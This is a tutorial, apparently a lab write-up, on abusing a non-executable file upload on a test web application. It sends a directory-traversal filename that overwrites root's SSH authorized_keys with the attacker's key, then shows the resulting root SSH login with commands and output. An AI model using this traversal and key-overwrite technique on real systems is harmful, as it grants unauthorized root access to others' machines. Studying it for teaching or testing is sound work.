Published on March 20, 2025
In this section, we’ll explore how file upload vulnerabilities can be abused even when executing uploaded files is not an option. Attackers may still find ways to exploit an unrestricted file upload mechanism by leveraging other vulnerabilities such as Directory Traversal.
We begin by analyzing the updated Lolipop web application at http://lolipop.com:8000.
We first test whether the application still has an admin.php or index.php file.
kali@kali:~$ curl http://lolipop.com:8000/index.php
404 page not found
kali@kali:~$ curl http://lolipop.com:8000/meteor/index.php
404 page not found
kali@kali:~$ curl http://lolipop.com:8000/admin.php
404 page not foundThese responses confirm that the application no longer runs PHP.
We attempt to upload a simple text file (test.txt) through the web application’s file upload form.
The upload is successful, but we must investigate whether we can manipulate the process further.
When testing a file upload feature, it’s crucial to determine whether duplicate file names are handled. If the server rejects duplicates, it may provide clues about file storage or naming conventions.
We modify the filename parameter to include a relative path traversal sequence (../../../../../../../test.txt) in an attempt to write outside the web root.
The response includes the ../ sequences, but we cannot confirm whether the file was placed in the intended location.
Web applications running on Apache, Nginx, or IIS use dedicated service accounts, such as www-data on Linux. However, some applications run with higher privileges, increasing the potential for privilege escalation.
If the web application is running as root or a privileged user, we may be able to overwrite the authorized_keys file in the root user’s .ssh directory. This would allow us to SSH into the machine using our own private key.
kali@kali:~$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): fileup
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in fileup
Your public key has been saved in fileup.pubWe then create an authorized_keys file containing our generated public key.
kali@kali:~$ cat fileup.pub > authorized_keysWe upload our authorized_keys file using the relative path ../../../../../../../root/.ssh/authorized_keys.
Figure 22: Exploit File Upload to write authorized_keys file in root home directoryAfter successfully overwriting the authorized_keys file, we attempt an SSH login.
kali@kali:~$ ssh -p 2222 -i fileup root@lolipop.com
The authenticity of host '[lolipop.com]:2222 ([192.168.50.16]:2222)' can't be established.
ED25519 key fingerprint is SHA256:R2JQNI3WJqpEehY2Iv9QdlMAoeB3jnPvjJqqfDZ3IXU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
...
root@76b77a6eae51:~#In this tutorial, we demonstrated how even non-executable file uploads can be leveraged for privilege escalation. By exploiting directory traversal and overwriting system files such as SSH keys, attackers can achieve unauthorized system access.